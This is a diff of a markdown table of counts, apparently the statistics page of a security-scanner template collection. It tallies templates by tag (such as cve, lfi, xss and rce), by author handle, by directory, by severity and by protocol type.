| | | | | | -| citrix | 6 | joeldeleep | 2 | | | | | | | -| laravel | 6 | afaq | 2 | | | | | | | -| windows | 6 | hahwul | 2 | | | | | | | -| sitecore | 6 | 0xprial | 2 | | | | | | | -| jetty | 6 | random-robbie | 2 | | | | | | | -| nodejs | 6 | sy3omda | 2 | | | | | | | -| jolokia | 6 | kiblyn11 | 2 | | | | | | | -| lucee | 6 | arcc | 2 | | | | | | | -| glpi | 6 | 0xcrypto | 2 | | | | | | | -| docker | 6 | 
nkxxkn | 2 | | | | | | | -| thinkphp | 5 | 0xrudra | 2 | | | | | | | -| wso2 | 5 | zomsop82 | 2 | | | | | | | -| dedecms | 5 | bp0lr | 2 | | | | | | | -| crlf | 5 | davidmckennirey | 2 | | | | | | | -| headless | 5 | hetroublemakr | 2 | | | | | | | -| symfony | 5 | whoever | 2 | | | | | | | -| minio | 5 | w4cky_ | 2 | | | | | | | -| iis | 5 | foulenzer | 2 | | | | | | | -| printer | 5 | bernardofsr | 2 | | | | | | | -| ssti | 5 | martincodes-de | 2 | | | | | | | -| git | 5 | parth | 2 | | | | | | | -| java | 5 | socketz | 2 | | | | | | | -| exchange | 5 | amsda | 2 | | | | | | | -| fatpipe | 5 | ffffffff0x | 2 | | | | | | | -| gocd | 5 | vavkamil | 2 | | | | | | | -| tomcat | 5 | r12w4n | 2 | | | | | | | -| circarlife | 5 | gevakun | 2 | | | | | | | -| elastic | 4 | pxmme1337 | 2 | | | | | | | -| resin | 4 | udit_thakkur | 2 | | | | | | | -| opensis | 4 | huowuzhao | 2 | | | | | | | -| keycloak | 4 | dahse89 | 2 | | | | | | | -| amazon | 4 | fabaff | 2 | | | | | | | -| webserver | 4 | cocxanh | 2 | | | | | | | -| zimbra | 4 | ree4pwn | 2 | | | | | | | -| solarwinds | 4 | koti2 | 2 | | | | | | | -| firmware | 4 | 0xsmiley | 2 | | | | | | | -| thinkcmf | 4 | gal nagli | 2 | | | | | | | -| strapi | 4 | 0xsapra | 2 | | | | | | | -| rfi | 4 | convisoappsec | 2 | | | | | | | -| moodle | 4 | 0xelkomy | 2 | | | | | | | -| traversal | 4 | lotusdll | 2 | | | | | | | -| bigip | 4 | randomrobbie | 2 | | | | | | | -| hongdian | 4 | bsysop | 2 | | | | | | | -| artifactory | 4 | g4l1t0 | 2 | | | | | | | -| samsung | 4 | x1m_martijn | 2 | | | | | | | -| zabbix | 4 | manas_harsh | 2 | | | | | | | -| firebase | 4 | its0x08 | 2 | | | | | | | -| panos | 4 | nytr0gen | 1 | | | | | | | -| asp | 4 | 0xd0ff9 | 1 | | | | | | | -| jellyfin | 4 | chron0x | 1 | | | | | | | -| buffalo | 4 | cckuailong | 1 | | | | | | | -| microstrategy | 4 | daviey | 1 | | | | | | | -| slack | 4 | skylark-lab | 1 | | | | | | | -| cve2007 | 4 | 52971 | 1 | | | | | | | -| maps | 4 | kaizensecurity | 1 | | | | | 
| | -| magmi | 4 | udyz | 1 | | | | | | | -| vpn | 4 | th3.d1p4k | 1 | | | | | | | -| proxy | 4 | micha3lb3n | 1 | | | | | | | -| symantec | 4 | pudsec | 1 | | | | | | | -| npm | 4 | sshell | 1 | | | | | | | -| wcs | 4 | ldionmarcil | 1 | | | | | | | -| enum | 4 | xshuden | 1 | | | | | | | -| jeesns | 3 | fopina | 1 | | | | | | | -| openssh | 3 | adrianmf | 1 | | | | | | | -| kibana | 3 | deena | 1 | | | | | | | -| node | 3 | ahmetpergamum | 1 | | | | | | | -| vbulletin | 3 | geraldino2 | 1 | | | | | | | -| icewarp | 3 | ohlinge | 1 | | | | | | | -| fanruan | 3 | zinminphy0 | 1 | | | | | | | -| telerik | 3 | fmunozs | 1 | | | | | | | -| movable | 3 | ipanda | 1 | | | | | | | -| smb | 3 | jeya seelan | 1 | | | | | | | -| ebs | 3 | mesaglio | 1 | | | | | | | -| backdoor | 3 | bolli95 | 1 | | | | | | | -| oa | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| ofbiz | 3 | revblock | 1 | | | | | | | -| itop | 3 | d0rkerdevil | 1 | | | | | | | -| activemq | 3 | mubassirpatel | 1 | | | | | | | -| axigen | 3 | smaranchand | 1 | | | | | | | -| tikiwiki | 3 | clarkvoss | 1 | | | | | | | -| spring | 3 | apt-mirror | 1 | | | | | | | -| mongodb | 3 | bad5ect0r | 1 | | | | | | | -| cves | 3 | ooooooo_q | 1 | | | | | | | -| lansweeper | 3 | schniggie | 1 | | | | | | | -| azure | 3 | hanlaomo | 1 | | | | | | | -| nexus | 3 | ratnadip gajbhiye | 1 | | | | | | | -| mail | 3 | _harleo | 1 | | | | | | | -| targa | 3 | andysvints | 1 | | | | | | | -| bitrix | 3 | philippdelteil | 1 | | | | | | | -| fpd | 3 | omarkurt | 1 | | | | | | | -| gogs | 3 | coldfish | 1 | | | | | | | -| kevinlab | 3 | whynotke | 1 | | | | | | | -| caucho | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| pentaho | 3 | ajaysenr | 1 | | | | | | | -| db | 3 | elmahdi | 1 | | | | | | | -| ssh | 3 | undefl0w | 1 | | | | | | | -| cloud | 3 | s1r1u5_ | 1 | | | | | | | -| smtp | 3 | yashgoti | 1 | | | | | | | -| nosqli | 3 | gboddin | 1 | | | | | | | -| search | 3 | _c0wb0y_ | 1 | 
| | | | | | -| hoteldruid | 3 | wabafet | 1 | | | | | | | -| linkerd | 3 | vzamanillo | 1 | | | | | | | -| sql | 3 | droberson | 1 | | | | | | | -| kafka | 3 | bernardo rodrigues | 1 | | | | | | | +| cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 | +| panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 | +| lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 | +| xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 | +| wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | | +| rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | +| exposure | 294 | princechaddha | 137 | workflows | 187 | | | | | +| cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | | +| tech | 272 | gy741 | 119 | default-logins | 96 | | | | | +| wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | | +| cve2020 | 197 | madrobot | 65 | takeovers | 67 | | | | | +| | 189 | zzeitlin | 64 | iot | 38 | | | | | +| token-spray | 155 | idealphase | 49 | network | 35 | | | | | +| joomla | 131 | ritikchaddha | 43 | miscellaneous | 23 | | | | | +| config | 126 | gaurang | 42 | cnvd | 23 | | | | | +| cve2018 | 122 | philippedelteil | 36 | dns | 17 | | | | | +| apache | 120 | adam crosser | 30 | fuzzing | 12 | | | | | +| cve2019 | 118 | ice3man | 26 | headless | 6 | | | | | +| cve2010 | 111 | organiccrap | 24 | ssl | 4 | | | | | +| unauth | 111 | c-sh0 | 23 | | | | | | | +| default-login | 111 | ffffffff0x | 22 | | | | | | | +| iot | 104 | akincibor | 20 | | | | | | | +| oast | 97 | for3stco1d | 18 | | | | | | | +| login | 85 | righettod | 18 | | | | | | | +| takeover | 73 | cckuailong | 17 | | | | | | | +| redirect | 73 | pr3r00t | 15 | | | | | | | +| token | 72 | sheikhrishad | 15 | | | | | | | +| cve2022 | 68 | milo2012 | 14 | | | | | | | +| misconfig | 68 | techbrunchfr | 14 | | | | | | | +| cve2017 | 64 | r3dg33k | 14 | | | | | | | +| sqli | 62 | sharath | 13 | | 
| | | | | +| ssrf | 62 | sullo | 12 | | | | | | | +| file | 60 | suman_kar | 12 | | | | | | | +| wp | 59 | cyllective | 11 | | | | | | | +| router | 58 | melbadry9 | 11 | | | | | | | +| network | 53 | wdahlenb | 11 | | | | | | | +| oracle | 51 | random_robbie | 10 | | | | | | | +| disclosure | 46 | hackergautam | 10 | | | | | | | +| cve2016 | 45 | dogasantos | 10 | | | | | | | +| auth-bypass | 42 | meme-lord | 10 | | | | | | | +| plugin | 40 | nadino | 10 | | | | | | | +| authenticated | 38 | johnk3r | 10 | | | | | | | +| cve2014 | 37 | alph4byt3 | 10 | | | | | | | +| google | 36 | edoardottt | 9 | | | | | | | +| cve2015 | 36 | emadshanab | 9 | | | | | | | +| cisco | 35 | aashiq | 8 | | | | | | | +| injection | 33 | iamthefrogy | 8 | | | | | | | +| logs | 33 | zh | 8 | | | | | | | +| atlassian | 32 | that_juan_ | 8 | | | | | | | +| jira | 30 | forgedhallpass | 7 | | | | | | | +| listing | 30 | dr_set | 7 | | | | | | | +| traversal | 29 | logicalhunter | 7 | | | | | | | +| devops | 29 | 0x240x23elu | 7 | | | | | | | +| generic | 27 | techryptic (@tech) | 7 | | | | | | | +| kubernetes | 26 | randomstr1ng | 7 | | | | | | | +| oss | 25 | kophjager007 | 7 | | | | | | | +| cms | 25 | oppsec | 7 | | | | | | | +| springboot | 24 | harshbothra_ | 7 | | | | | | | +| adobe | 24 | divya_mudgal | 7 | | | | | | | +| cnvd | 23 | random-robbie | 7 | | | | | | | +| proxy | 22 | pathtaga | 6 | | | | | | | +| sap | 22 | pentest_swissky | 6 | | | | | | | +| intrusive | 22 | leovalcante | 6 | | | | | | | +| vmware | 21 | caspergn | 6 | | | | | | | +| debug | 21 | __fazal | 6 | | | | | | | +| misc | 21 | puzzlepeaches | 6 | | | | | | | +| aem | 21 | iamnoooob | 6 | | | | | | | +| microsoft | 21 | evan rubinstein | 6 | | | | | | | +| service | 20 | rootxharsh | 6 | | | | | | | +| fuzz | 20 | tess | 5 | | | | | | | +| wp-theme | 20 | imnightmaree | 5 | | | | | | | +| manageengine | 19 | xelkomy | 5 | | | | | | | +| cve2012 | 19 | _0xf4n9x_ | 5 | | | | | | | +| dns | 19 | podalirius | 5 | 
| | | | | | +| zoho | 18 | ganofins | 5 | | | | | | | +| deserialization | 18 | veshraj | 5 | | | | | | | +| php | 18 | elsfa7110 | 5 | | | | | | | +| tomcat | 17 | lu4nx | 5 | | | | | | | +| weblogic | 17 | panch0r3d | 5 | | | | | | | +| k8s | 17 | joanbono | 5 | | | | | | | +| aws | 17 | yanyun | 5 | | | | | | | +| ibm | 16 | praetorian-thendrickson | 5 | | | | | | | +| struts | 16 | tanq16 | 4 | | | | | | | +| dlink | 16 | defr0ggy | 4 | | | | | | | +| jenkins | 15 | dadevel | 4 | | | | | | | +| cve2011 | 15 | incogbyte | 4 | | | | | | | +| gitlab | 15 | dolev farhi | 4 | | | | | | | +| fileupload | 15 | nodauf | 4 | | | | | | | +| java | 14 | h1ei1 | 4 | | | | | | | +| cve2009 | 14 | wisnupramoedya | 4 | | | | | | | +| api | 14 | e_schultze_ | 4 | | | | | | | +| hp | 14 | me9187 | 3 | | | | | | | +| xxe | 14 | arcc | 3 | | | | | | | +| android | 14 | _generic_human_ | 3 | | | | | | | +| ruijie | 13 | yash anand @yashanand155 | 3 | | | | | | | +| firewall | 13 | lark-lab | 3 | | | | | | | +| camera | 13 | sushantkamble | 3 | | | | | | | +| netsweeper | 12 | mavericknerd | 3 | | | | | | | +| log4j | 12 | yuzhe-zhang-0 | 3 | | | | | | | +| lfr | 12 | binaryfigments | 3 | | | | | | | +| rails | 12 | shifacyclewala | 3 | | | | | | | +| status | 12 | dudez | 3 | | | | | | | +| printer | 12 | alifathi-h1 | 3 | | | | | | | +| cve2013 | 12 | z3bd | 3 | | | | | | | +| nginx | 12 | supras | 3 | | | | | | | +| netgear | 11 | f1tz | 3 | | | | | | | +| magento | 11 | emenalf | 3 | | | | | | | +| cnvd2021 | 11 | jarijaas | 3 | | | | | | | +| graphql | 11 | skeltavik | 3 | | | | | | | +| fortigate | 10 | johnjhacking | 3 | | | | | | | +| dell | 10 | mr-xn | 3 | | | | | | | +| airflow | 10 | davidmckennirey | 3 | | | | | | | +| jolokia | 10 | 0w4ys | 3 | | | | | | | +| glpi | 10 | r3naissance | 3 | | | | | | | +| grafana | 10 | shine | 3 | | | | | | | +| coldfusion | 10 | thomas_from_offensity | 3 | | | | | | | +| upload | 10 | impramodsargar | 3 | | | | | | | +| spring | 10 | 
fyoorer | 3 | | | | | | | +| backup | 10 | unstabl3 | 3 | | | | | | | +| auth | 9 | github.com/its0x08 | 3 | | | | | | | +| wso2 | 9 | gitlab red team | 3 | | | | | | | +| woocommerce | 9 | whoever | 3 | | | | | | | +| webserver | 9 | andydoering | 3 | | | | | | | +| iis | 9 | 0xcrypto | 2 | | | | | | | +| ftp | 9 | 0xelkomy | 2 | | | | | | | +| cve2008 | 9 | 0ri2n | 2 | | | | | | | +| mirai | 9 | afaq | 2 | | | | | | | +| jndi | 9 | fabaff | 2 | | | | | | | +| laravel | 9 | r12w4n | 2 | | | | | | | +| windows | 9 | 3th1c_yuk1 | 2 | | | | | | | +| zabbix | 9 | swissky | 2 | | | | | | | +| fastjson | 9 | taielab | 2 | | | | | | | +| github | 9 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| drupal | 9 | kiblyn11 | 2 | | | | | | | +| fortinet | 9 | vsh00t | 2 | | | | | | | +| citrix | 8 | y4er | 2 | | | | | | | +| confluence | 8 | raesene | 2 | | | | | | | +| solr | 8 | ree4pwn | 2 | | | | | | | +| prometheus | 8 | luci | 2 | | | | | | | +| django | 8 | joeldeleep | 2 | | | | | | | +| zyxel | 8 | pxmme1337 | 2 | | | | | | | +| audit | 8 | amsda | 2 | | | | | | | +| azure | 8 | thardt-praetorian | 2 | | | | | | | +| scada | 8 | danielmofer | 2 | | | | | | | +| blind | 8 | 0xsmiley | 2 | | | | | | | +| kube | 8 | ehsahil | 2 | | | | | | | +| vcenter | 8 | sbani | 2 | | | | | | | +| phpmyadmin | 8 | lotusdll | 2 | | | | | | | +| amazon | 8 | moritz nentwig | 2 | | | | | | | +| metadata | 8 | bsysop | 2 | | | | | | | +| ssti | 7 | g4l1t0 | 2 | | | | | | | +| python | 7 | z0ne | 2 | | | | | | | +| vpn | 7 | smaranchand | 2 | | | | | | | +| kafka | 7 | zomsop82 | 2 | | | | | | | +| rconfig | 7 | nkxxkn | 2 | | | | | | | +| firebase | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| files | 7 | 0xrudra | 2 | | | | | | | +| mail | 7 | mohammedsaneem | 2 | | | | | | | +| bucket | 7 | paperpen | 2 | | | | | | | +| maps | 7 | geekby | 2 | | | | | | | +| squirrelmail | 7 | redteambrasil | 2 | | | | | | | +| elasticsearch | 7 | hackerarpan | 2 | | | | | | | +| exchange | 7 
| joshlarsen | 2 | | | | | | | +| cnvd2020 | 7 | vavkamil | 2 | | | | | | | +| sonicwall | 7 | hetroublemakr | 2 | | | | | | | +| backdoor | 6 | nuk3s3c | 2 | | | | | | | +| go | 6 | sy3omda | 2 | | | | | | | +| jetty | 6 | bp0lr | 2 | | | | | | | +| magmi | 6 | hahwul | 2 | | | | | | | +| nodejs | 6 | socketz | 2 | | | | | | | +| cicd | 6 | 0xprial | 2 | | | | | | | +| jboss | 6 | x1m_martijn | 2 | | | | | | | +| huawei | 6 | its0x08 | 2 | | | | | | | +| ofbiz | 6 | bing0o | 2 | | | | | | | +| docker | 6 | badboycxcc | 2 | | | | | | | +| druid | 6 | bananabr | 2 | | | | | | | +| firmware | 6 | k11h-de | 2 | | | | | | | +| dedecms | 6 | udit_thakkur | 2 | | | | | | | +| crlf | 6 | convisoappsec | 2 | | | | | | | +| zimbra | 6 | gal nagli | 2 | | | | | | | +| fpd | 6 | kre80r | 2 | | | | | | | +| bigip | 6 | splint3r7 | 2 | | | | | | | +| cobbler | 6 | paradessia | 2 | | | | | | | +| ecology | 6 | nvn1729 | 2 | | | | | | | +| bypass | 6 | ambassify | 2 | | | | | | | +| sitecore | 6 | manas_harsh | 2 | | | | | | | +| lucee | 6 | parth | 2 | | | | | | | +| headless | 6 | martincodes-de | 2 | | | | | | | +| enum | 6 | randomrobbie | 2 | | | | | | | +| slack | 6 | rafaelwdornelas | 2 | | | | | | | +| kubelet | 5 | hassan khan yusufzai - | 2 | | | | | | | +| | | splint3r7 | | | | | | | | +| rfi | 5 | dahse89 | 2 | | | | | | | +| solarwinds | 5 | w4cky_ | 2 | | | | | | | +| icewarp | 5 | cckuakilong | 2 | | | | | | | +| symfony | 5 | huowuzhao | 2 | | | | | | | +| artica | 5 | 0xsapra | 2 | | | | | | | +| microweber | 5 | koti2 | 2 | | | | | | | +| apisix | 5 | dheerajmadhukar | 2 | | | | | | | +| circarlife | 5 | bernardofsr | 2 | | | | | | | +| setup | 5 | ajaysenr | 2 | | | | | | | +| strapi | 5 | foulenzer | 2 | | | | | | | +| rseenet | 5 | cocxanh | 2 | | | | | | | +| cache | 5 | gevakun | 2 | | | | | | | +| ruby | 5 | v0idc0de | 1 | | | | | | | +| git | 5 | mass0ma | 1 | | | | | | | +| moodle | 5 | manuelbua | 1 | | | | | | | +| metinfo | 5 | bartu utku sarp | 1 | | 
| | | | | +| opensis | 5 | amnotacat | 1 | | | | | | | +| zhiyuan | 5 | j33n1k4 | 1 | | | | | | | +| keycloak | 5 | gboddin | 1 | | | | | | | +| fatpipe | 5 | cookiehanhoan | 1 | | | | | | | +| storage | 5 | luskabol | 1 | | | | | | | +| leak | 5 | intx0x80 | 1 | | | | | | | +| thinkphp | 5 | 0xd0ff9 | 1 | | | | | | | +| symantec | 5 | duty_1g | 1 | | | | | | | +| error | 5 | kareemse1im | 1 | | | | | | | +| samsung | 5 | fopina | 1 | | | | | | | +| minio | 5 | sherlocksecurity | 1 | | | | | | | +| gocd | 5 | arm!tage | 1 | | | | | | | +| node | 5 | c3l3si4n | 1 | | | | | | | +| alibaba | 5 | mesaglio | 1 | | | | | | | +| ssl | 5 | kiks7 | 1 | | | | | | | +| voip | 4 | pdp | 1 | | | | | | | +| panos | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | +| puppet | 4 | adrianmf | 1 | | | | | | | +| ssh | 4 | udyz | 1 | | | | | | | +| couchdb | 4 | hanlaomo | 1 | | | | | | | +| hoteldruid | 4 | xshuden | 1 | | | | | | | +| resin | 4 | omarkurt | 1 | | | | | | | +| beyondtrust | 4 | aresx | 1 | | | | | | | +| websphere | 4 | yashgoti | 1 | | | | | | | +| oa | 4 | 0xceba | 1 | | | | | | | +| hongdian | 4 | rubina119 | 1 | | | | | | | +| sophos | 4 | thesubtlety | 1 | | | | | | | +| sonarqube | 4 | _darrenmartyn | 1 | | | | | | | +| plesk | 4 | geraldino2 | 1 | | | | | | | +| buffalo | 4 | jeya.seelan | 1 | | | | | | | +| microstrategy | 4 | andysvints | 1 | | | | | | | +| gogs | 4 | mhdsamx | 1 | | | | | | | +| hpe | 4 | prajiteshsingh | 1 | | | | | | | +| thinkcmf | 4 | kabirsuda | 1 | | | | | | | +| smtp | 4 | 0xrod | 1 | | | | | | | +| prestashop | 4 | ratnadip gajbhiye | 1 | | | | | | | +| search | 4 | s1r1u5_ | 1 | | | | | | | +| jetbrains | 4 | qlkwej | 1 | | | | | | | +| flink | 4 | sec_hawk | 1 | | | | | | | +| activemq | 4 | regala_ | 1 | | | | | | | +| elastic | 4 | affix | 1 | | | | | | | +| cacti | 4 | akash.c | 1 | | | | | | | +| springcloud | 4 | oscarintherocks | 1 | | | | | | | +| jellyfin | 4 | luqmaan hadia | 1 | | | | | | | +| xmlrpc | 4 | willd96 | 1 
| | | | | | | +| caucho | 4 | mrcl0wnlab | 1 | | | | | | | +| artifactory | 4 | schniggie | 1 | | | | | | | +| stripe | 4 | streetofhackerr007 | 1 | | | | | | | +| hikvision | 4 | ohlinge | 1 | | | | | | | +| cnvd2019 | 4 | infosecsanyam | 1 | | | | | | | +| db | 4 | zhenwarx | 1 | | | | | | | +| wcs | 4 | wabafet | 1 | | | | | | | +| cockpit | 4 | th3.d1p4k | 1 | | | | | | | +| paypal | 4 | pudsec | 1 | | | | | | | +| terramaster | 4 | compr00t | 1 | | | | | | | +| cve2007 | 4 | bibeksapkota (sar00n) | 1 | | | | | | | +| awstats | 4 | osamahamad | 1 | | | | | | | +| ognl | 4 | ldionmarcil | 1 | | | | | | | +| tikiwiki | 4 | ok_bye_now | 1 | | | | | | | +| kevinlab | 4 | d4vy | 1 | | | | | | | +| kibana | 4 | iampritam | 1 | | | | | | | +| mongodb | 4 | momen eldawakhly | 1 | | | | | | | +| aspose | 4 | knassar702 | 1 | | | | | | | +| asp | 4 | wlayzz | 1 | | | | | | | +| cloud | 4 | anon-artist | 1 | | | | | | | +| mailchimp | 4 | ooooooo_q | 1 | | | | | | | +| adminer | 4 | sicksec | 1 | | | | | | | +| npm | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| nexus | 4 | tea | 1 | | | | | | | +| photo | 4 | xstp | 1 | | | | | | | +| exposures | 3 | juicypotato1 | 1 | | | | | | | +| wavlink | 3 | 0ut0fb4nd | 1 | | | | | | | +| elfinder | 3 | alexrydzak | 1 | | | | | | | +| dos | 3 | retr02332 | 1 | | | | | | | +| axigen | 3 | ggranjus | 1 | | | | | | | +| jamf | 3 | arall | 1 | | | | | | | +| geowebserver | 3 | nielsing | 1 | | | | | | | +| httpd | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| redis | 3 | thezakman | 1 | | | | | | | +| sangfor | 3 | petruknisme | 1 | | | | | | | +| ampps | 3 | alevsk | 1 | | | | | | | +| linksys | 3 | 0h1in9e | 1 | | | | | | | +| sql | 3 | thebinitghimire | 1 | | | | | | | +| zeroshell | 3 | majidmc2 | 1 | | | | | | | +| hashicorp | 3 | elouhi | 1 | | | | | | | +| 3cx | 3 | ph33r | 1 | | | | | | | +| samba | 3 | jeya seelan | 1 | | | | | | | +| telerik | 3 | bad5ect0r | 1 | | | | | | | +| axis | 3 | ahmed sherif | 1 | | | 
| | | | +| modem | 3 | alex | 1 | | | | | | | +| epson | 3 | justmumu | 1 | | | | | | | +| aptus | 3 | _harleo | 1 | | | | | | | +| subrion | 3 | higor melgaço (eremit4) | 1 | | | | | | | +| database | 3 | ola456 | 1 | | | | | | | +| thinfinity | 3 | 0xceeb | 1 | | | | | | | +| heroku | 3 | nerrorsec | 1 | | | | | | | +| dotcms | 3 | daffianfo | 1 | | | | | | | +| movable | 3 | brenocss | 1 | | | | | | | +| kingsoft | 3 | nytr0gen | 1 | | | | | | | +| netlify | 3 | miroslavsotak | 1 | | | | | | | +| phppgadmin | 3 | b0yd | 1 | | | | | | | +| messaging | 3 | jbaines-r7 | 1 | | | | | | | +| lansweeper | 3 | izn0u | 1 | | | | | | | +| square | 3 | d0rkerdevil | 1 | | | | | | | +| javascript | 3 | hexcat | 1 | | | | | | | +| dreambox | 3 | sickwell | 1 | | | | | | | +| nacos | 3 | clarkvoss | 1 | | | | | | | +| axis2 | 3 | borna nematzadeh | 1 | | | | | | | +| circleci | 3 | b0rn2r00t | 1 | | | | | | | +| seeyon | 3 | yavolo | 1 | | | | | | | +| synology | 3 | yashanand155 | 1 | | | | | | | +| pentaho | 3 | rotemreiss | 1 | | | | | | | +| empirecms | 3 | skylark-lab | 1 | | | | | | | +| concrete | 3 | flag007 | 1 | | | | | | | +| ebs | 3 | bjhulst | 1 | | | | | | | +| splunk | 3 | jas37 | 1 | | | | | | | +| octobercms | 3 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| exposures | 3 | remonsec | 1 | | | | | | | -| r-seenet | 3 | un-fmunozs | 1 | | | | | | | -| ampps | 3 | patralos | 1 | | | | | | | -| hashicorp | 3 | jrolf | 1 | | | | | | | -| log | 3 | _darrenmartyn | 1 | | | | | | | -| openam | 3 | kareemse1im | 1 | | | | | | | -| terramaster | 3 | nerrorsec | 1 | | | | | | | -| springcloud | 3 | b4uh0lz | 1 | | | | | | | -| sonicwall | 3 | b0yd | 1 | | | | | | | -| lfr | 3 | j33n1k4 | 1 | | | | | | | -| github | 3 | alex | 1 | | | | | | | -| druid | 3 | 2rs3c | 1 | | | | | | | -| injection | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| cacti | 3 | petruknisme | 1 | | | | | | | -| httpd | 3 
| hakluke | 1 | | | | | | | -| zhiyuan | 3 | redteambrasil | 1 | | | | | | | -| nacos | 3 | kurohost | 1 | | | | | | | -| rackstation | 2 | aresx | 1 | | | | | | | -| hjtcloud | 2 | becivells | 1 | | | | | | | -| frontpage | 2 | thebinitghimire | 1 | | | | | | | -| plesk | 2 | fq_hsu | 1 | | | | | | | -| centos | 2 | blckraven | 1 | | | | | | | -| ecology | 2 | izn0u | 1 | | | | | | | -| huawei | 2 | orpheus | 1 | | | | | | | -| wuzhicms | 2 | ofjaaah | 1 | | | | | | | -| phpcollab | 2 | charanrayudu | 1 | | | | | | | -| python | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| pega | 2 | manuelbua | 1 | | | | | | | -| wordfence | 2 | yuansec | 1 | | | | | | | -| aviatrix | 2 | iampritam | 1 | | | | | | | -| ems | 2 | cookiehanhoan | 1 | | | | | | | -| jboss | 2 | sbani | 1 | | | | | | | -| rstudio | 2 | thevillagehacker | 1 | | | | | | | -| justwriting | 2 | retr02332 | 1 | | | | | | | -| backups | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| hostheader-injection | 2 | alperenkesk | 1 | | | | | | | -| gitlist | 2 | rodnt | 1 | | | | | | | -| neos | 2 | thezakman | 1 | | | | | | | -| lotus | 2 | kba@sogeti_esec | 1 | | | | | | | -| adminer | 2 | tirtha_mandal | 1 | | | | | | | -| kong | 2 | c3l3si4n | 1 | | | | | | | -| kentico | 2 | evan rubinstein | 1 | | | | | | | -| jsf | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| qcubed | 2 | flag007 | 1 | | | | | | | -| middleware | 2 | 0xtavian | 1 | | | | | | | -| commax | 2 | mhdsamx | 1 | | | | | | | -| trixbox | 2 | toufik airane | 1 | | | | | | | -| fortios | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| voipmonitor | 3 | evan rubinstien | 1 | | | | | | | +| dolibarr | 3 | 0xh7ml | 1 | | | | | | | +| cloudflare | 3 | igibanez | 1 | | | | | | | +| bruteforce | 3 | daviey | 1 | | | | | | | +| sendgrid | 3 | act1on3 | 1 | | | | | | | +| glassfish | 3 | deena | 1 | | | | | | | +| prtg | 3 | ilovebinbash | 1 | | | | | | | +| odoo | 3 | 0xtavian | 1 | | | | | | | +| 
trixbox | 3 | myztique | 1 | | | | | | | +| openemr | 3 | retr0 | 1 | | | | | | | +| horizon | 3 | orpheus | 1 | | | | | | | +| oauth | 3 | berkdusunur | 1 | | | | | | | +| vrealize | 3 | f1she3 | 1 | | | | | | | +| workspaceone | 3 | apt-mirror | 1 | | | | | | | +| sharepoint | 3 | becivells | 1 | | | | | | | +| sugarcrm | 3 | lethargynavigator | 1 | | | | | | | +| phpinfo | 3 | exceed | 1 | | | | | | | +| seagate | 3 | ofjaaah | 1 | | | | | | | +| vbulletin | 3 | toufik-airane | 1 | | | | | | | +| actuator | 3 | breno_css | 1 | | | | | | | +| targa | 3 | rodnt | 1 | | | | | | | +| wordfence | 3 | zandros0 | 1 | | | | | | | +| log | 3 | rschio | 1 | | | | | | | +| jfrog | 3 | narluin | 1 | | | | | | | +| facebook | 3 | notnotnotveg | 1 | | | | | | | +| mcafee | 3 | dhiyaneshdki | 1 | | | | | | | +| panabit | 3 | p-l- | 1 | | | | | | | +| globalprotect | 3 | tim_koopmans | 1 | | | | | | | +| openssh | 3 | fmunozs | 1 | | | | | | | +| kentico | 3 | streetofhackerr007 (rohit | 1 | | | | | | | | | | soni) | | | | | | | | -| natshell | 2 | 0h1in9e | 1 | | | | | | | -| spark | 2 | kre80r | 1 | | | | | | | -| status | 2 | exploitation | 1 | | | | | | | -| phpstorm | 2 | intx0x80 | 1 | | | | | | | -| nagios | 2 | sicksec | 1 | | | | | | | -| ecoa | 2 | co0nan | 1 | | | | | | | -| igs | 2 | brabbit10 | 1 | | | | | | | -| rosariosis | 2 | florianmaak | 1 | | | | | | | -| pgadmin | 2 | notsoevilweasel | 1 | | | | | | | -| ec2 | 2 | tim_koopmans | 1 | | | | | | | -| jetbrains | 2 | shelld3v | 1 | | | | | | | -| idea | 2 | pdp | 1 | | | | | | | -| horde | 2 | affix | 1 | | | | | | | -| leak | 2 | raesene | 1 | | | | | | | -| liferay | 2 | retr0 | 1 | | | | | | | -| service | 2 | xstp | 1 | | | | | | | -| vcenter | 2 | sickwell | 1 | | | | | | | -| mcafee | 2 | qlkwej | 1 | | | | | | | -| jeedom | 2 | shifacyclewla | 1 | | | | | | | -| zeroshell | 2 | berkdusunur | 1 | | | | | | | -| frp | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| bitly | 2 | notnotnotveg | 1 | | 
| | | | | -| rancher | 2 | willd96 | 1 | | | | | | | -| ruby | 2 | alevsk | 1 | | | | | | | -| splunk | 2 | ilovebinbash | 1 | | | | | | | -| prestashop | 2 | zandros0 | 1 | | | | | | | -| text | 2 | rojanrijal | 1 | | | | | | | -| chamilo | 2 | sec_hawk | 1 | | | | | | | -| dolibarr | 2 | harshinsecurity | 1 | | | | | | | -| aspose | 2 | furkansayim | 1 | | | | | | | -| chyrp | 2 | akshansh | 1 | | | | | | | -| forcepoint | 2 | majidmc2 | 1 | | | | | | | -| qihang | 2 | borna nematzadeh | 1 | | | | | | | -| ucmdb | 2 | makyotox | 1 | | | | | | | -| totemomail | 2 | juicypotato1 | 1 | | | | | | | -| idrac | 2 | lethargynavigator | 1 | | | | | | | -| places | 2 | infosecsanyam | 1 | | | | | | | -| chiyu | 2 | lark lab | 1 | | | | | | | -| ad | 2 | soyelmago | 1 | | | | | | | -| aruba | 2 | 